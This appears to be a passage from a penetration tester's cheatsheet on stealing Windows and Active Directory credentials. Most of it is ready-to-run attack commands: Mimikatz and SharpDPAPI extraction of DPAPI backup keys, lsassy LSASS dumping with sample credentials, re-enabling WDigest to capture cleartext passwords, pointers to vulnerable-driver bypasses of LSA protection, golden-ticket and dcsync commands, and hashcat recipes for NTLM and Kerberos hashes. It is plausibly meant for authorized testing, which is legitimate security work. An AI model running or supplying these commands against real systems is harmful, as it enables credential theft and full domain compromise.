DPAPI - Data Protectgion API. When a software offers a "remember me" or "save credentials" feature, DPAPI is probably used to encrypt credentials before storing them. (Part of Crypt32.dll)

DPAPI use 2 main functions: CryptUnprotectDat and CryptProtectData.

DPAPI encryption mechanism relies on masterkeys (MK), used to encrypt the data. The Masterkeys are encrypted with a derivative from the user's password or the DPAPI system key.

User masterkeys are located here:

C:\Users\<user>\AppData\Roaming\Protect\Microsoft\<SID>

Machine masterkeys are located here:

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User
C:\Windows\System32\Microsoft\Protect\S-1-5-18

Different types of secrets are encrypted using DPAPI: - Credentials

For User:
PS C:\Users\lutzenfried> Get-ChildItem -Hidden C:\Users\lutzenfried\AppData\Local\Microsoft\Credentials\


    Directory: C:\Users\lutzenfried\AppData\Local\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-        2023-04-23   9:41 PM           4368 B81681331F8F01AA4D35198BE3BF510B
-a-hs-        2023-03-01  11:01 AM          11104 DFBE70A7E5CC19A398EBF1B96859CE5D
-a-hs-        2023-03-02  10:34 AM           1264 E05DBE15D38053457F3523A375594044

For Systems:
Get-ChildItem -Hidden C:/Windows/System32/config/systemprofile/AppData/Local/Microsoft/Credentials/
- Vault - DPAPI blob Wi-Fi credentials are stored as DPAPI blobs inside the following files:
Location: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\*.xml

> netsh wlan show profile

> netsh wlan show profile SSID key=clear
- RSA / NGC

--> As Domain Admin, you can extract the backup key that lets you decrypt any users' secrets.
Using Mimikatz

lsadump::backupkeys /system:dc01.offense.local /export

Using SharpDPAPI

SharpDPAPI.exe backupkey /nowrap

You will potentially sometimes be able to identify binary blob encrypted using DPAPI based on 62 bytes:

01 00 00 00 d0 8c 9d df  01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00  d2 87 4b 1d ab ce 3d 43 a7 c8 43 4d bf ca ee fa  00 00 00 00 02 00 00 00 00 00 10 66 00 00 00 01  00 00 20 00 00 00

Lsassy
lsassy -d company.local -u jdoe -p Pass1234 192.168.1.0/24

Bring Your Own Domain Controller

Misc : AD Audit

WDigest

Wdigest was introduced in WinXP and designed to be used with HTTP protocol for authentication.

Enabled by default in multiple versions of Windows: - Windows XP - Windows 8.0 - Server 2003 - Server 2008 - Server 2012

--> With WDigest plain text passwords are stored in LSASS.

Retrieving using Mimikatz

sekurlsa::wdigest

Can be deactivated/activated setting to 1 the value of UseLogonCredential and Negotiate in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.
--> If these registry keys don't exist or the value is "0", then WDigest will be deactivated.

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Negotiate

As an attacker you can reactivate WDigest to get cleartext credentials on sensitive systems.

crackmapexec smb 192.168.0.10 -u jdoe -p Pass123 -M wdigest -o ACTION=enable
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Passwords stored in LSA (LSA Storage)

Since Windows 8.1 you can protect LSA storage using Protected Process (RunAsPPL).
--> This will prevent regular mimikatz.exe sekurlsa:logonpasswords for working properly.

With this registry key enable, the following 3 actions (which require an handle on LSASS ) will no longer be possible:

sekurlsa:logonpasswords
lsadump::lsa: Did not work
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlmhash>

With this registry key enable, the following 5 actions will still be possible:

lsadump::dcsync /domain:<domain> /user:<user>
lsadump::secrets (get syskey information to decrypt secrets from the registry on disk)
lsadump::sam (Reading credentials from the SAM on disk)
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt hash> /endin:<value> /renewmax:<value>
keystroke logging

Validate RunAsPPL is enable

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL

Documentation about LSA secrets: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

--> Mimikatz has the mimidrv.sys driver that can bypass LSA Protection. Pretty much flag everywhere you will need to write you own driver. - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148 --> You can also build your own driver and sign it digitally
--> You can also load an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel
- https://github.com/fengjixuchui/gdrv-loader
- https://github.com/RedCursorSecurityConsulting/PPLKiller - https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5 --> Use other process (e.g Antivirus process) which sometimes have already handles on LSASS process
- https://skelsec.medium.com/duping-av-with-handles-537ef985eb03

Abusing leaked handles to dump LSASS memory

LM password storage

LM hash is an old deprecated method of storing passwords which has the following weaknesses:
- Password length is limited to 14 characters - Passwords that are longer than 7 characters are split into two and each half is hashed separately - All lower-case characters are converted to upper-case before hashing

grep -iv ':aad3b435b51404eeaad3b435b51404ee:' ntds.dit

Storing passwords using reversible encryption

Inactive domain accounts

sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'

Privileged users with password reset overdue

Once the dumping is done (ldapdomaindump), get the list of users with AdminCount attribute set to 1 by parsing the ‘domain_users.json’ file:

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
Then iterate through the list of privileged users, display their last password reset date (pwdLastSet) and sort it:
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
  grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'

Users with non-expiring passwords

grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED

Service account within privileged groups

net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

AdminCount on regular users

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json

Data-Exfiltration

Data exfiltration and DLP (Data Loss Prevention) bypass.

Cracking Hashes

LM hash

hashcat -m 3000 -a 0 lm_hashes.txt ../../wordlists/rockyou_2021.txt

NTLM hash

Hashcat mask attack: A mask attack is an evolution over the brute-force and allows us to be more selective over the keyspace in certain positions.
- https://hashcat.net/wiki/doku.php?id=mask_attack

hashcat -m 1000 -a 3 ntds.dit ?u?l?l?l?l?d?d?d?d?s
hashcat -m 1000 -a 3 ntds.dit Company?d?d?d?s

Mask attack using custom charset for specific characters: - 1 ?d?s defines a custom charset (digits and specials). - ?u?l?l?l?l?l?l?l?1 is the mask, where ?1 is the custom charset.

hashcat.exe -a 3 -m 1000 ntds.dit -1 ?d?s ?u?l?l?l?l?l?l?l?1

Hashcat rule based cracking

hashcat -m 1000 -a 0 --username ntds.dit ../../wordlists/rockyou_2021.txt -r ../../wordlists/OneRuleToRuleThemAll.rule

Hashcat wordlist cracking

hashcat -m 1000 -a 0 --username ntds.dit ../../wordlists/rockyou_2021.txt

Hashcat using mask length and mask files (hcmask)

lutzenfried@xec:~ cat ./test.hcmask
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1?1
?d?s,?u?l?l?l?l?l?l?1?1
?d?s,?u?l?l?l?l?l?1?1
?d?s,?u?l?l?l?l?1?1
?d?s,?u?l?l?l?1?1?1
?d?s,?u?l?l?l?l?1?1?1
?d?s,?u?l?l?l?l?l?1?1?1
?d?s,?u?l?l?l?l?l?l?1?1?1
?d?s,?u?l?l?l?l?l?1?1?1?1
?d?s,?u?l?l?l?l?1?1?1?1
?d?s,?u?l?l?l?1?1?1?1
?d?s,?u?l?l?1?1?1?1
?d?s,?u?l?1?1?1?1?1
?d?s,?u?l?l?1?1?1?1?1
?d?s,?u?l?l?l?1?1?1?1?1
?d?s,?u?l?l?l?l?1?1?1?1?1

hashcat -m 1000 -a 3 -m 1000 NTDS.dit test.hcmask

Net-NTLMv1

hashcat -m 5500 -a 0 ntlmv1_hashes.txt ../../wordlists/rockyou_2021.txt 

Net-NTLMv2

hashcat -m 5600 -a 0 ntlmv2_hashes.txt ../../wordlists/rockyou_2021.txt 

AS-Rep Roast response (Kerberos 5 AS-REP etype 23)

hashcat -m 18200 -a 0 AS_REP_responses_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberoast (Service Ticket)

hashcat -m 13100 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberos 5 TGS (AES128)

hashcat -m 19600 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberos 5 TGS (AES256)

hashcat -m 19700 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

MsCache 2 (DCC2)

Slow to be cracked due to PBKDF2 usage (PBKDF2(HMAC-SHA1, 10240, DCC1, username) - https://security.stackexchange.com/questions/30889/cracking-ms-cache-v2-hashes-using-gpu - https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/

hashcat -m 2100 -a 0 DCC2_hashes.txt ../../wordlists/rockyou_2021.txt

Within Hashcat other mode such as Hybrid (6 and 7) and Combinator (1) can be used: - Combinator will combine 2 dictionaries/wordlists

lutzenfried@xec:~ cat wordlist1.txt
wifi
wireless

lutzenfried@xec:~ cat wordlist2.txt
pass
password

# Some rule will be apply using -j and -k 
hashcat -m 22000 PSK_capture.hccap wordlist1.txt wordlist2.txt -j $- -k $23

wifi-pass23
wireless-pass23
wifi-pass23
wifi-password23

Keyboard walks wordlists:
- https://github.com/hashcat/kwprocessor.git - https://github.com/Rich5/Keyboard-Walk-Generators

lutzenfried@xec:~ /tmp/kwprocessor ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-10-max-3-direction-changes.route -o key_walk_en_us_10_max.txt

Reporting / Collaborative

PlumHound

Pwndoc

Password audit reporting

Defenses

Restricted Admin Mode

Windows Defender Antivirus

AppLocker

Rules: Are defined and control execution of the followings items: - Applications - Scripts - Packaged Applications - Installers - DLL

Conditions: Are based on the followings filters: - Publisher (Ex: Software signed by valid vendor) - Path - File hash

--> Finally : Allow and Deny actions can be assigned to specific user/group.

Windows Defender Application Control (WDAC)

Windows Defender Advanced Threat Protection (ATP)

Windows Defender : Exploit Guard

Windows Defender : Application Guard

Windows Defender : Device Guard

Windows Defender : Credential Guard

Resources

Steve Syfuhs blog

Red Team Cheatsheet

OCD - AD Mind Map

PetitPotam and ADCS

Active Directory Exploitation cheatsheet

Attacking Active Directory

Kerberos Delegation

Exceptional blog posts regarding Windows Authentication/Credentials/RDP

Windows Logon Types

Windows Name Pipes

COM / DCOM

PowerShell Without PowerShell

Tools: - PowerLine - NPS - Not PowerShell - PowerShdll - PowerLessShell - Nopowershell - SyncAppvPublishingServer